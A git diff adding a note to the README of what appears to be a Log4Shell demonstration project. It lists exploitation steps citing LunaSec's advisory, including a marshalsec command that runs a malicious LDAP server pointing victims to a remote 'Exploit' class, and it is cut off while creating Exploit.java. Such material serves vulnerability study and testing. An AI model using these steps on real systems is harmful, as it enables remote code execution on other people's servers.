diff --git a/README.md b/README.md index a79966c..2029875 100644 --- a/README.md +++ b/README.md @@ -46,6 +46,36 @@ You will see the following stack trace in the application logs: at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172) ``` +## Note + +While this is enough to show the application is vulnerable, I do not have a full PoC yet. As explained in LunaSec's advisory, the exploitation steps should be: +* Use [MarshelSec](https://github.com/mbechler/marshalsec) to run a malicious LDAP server: + +``` +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-local-ip:8888/#Exploit" +``` + +* Generate `Exploit.class` as follows: + +``` +cat >> Exploit.java <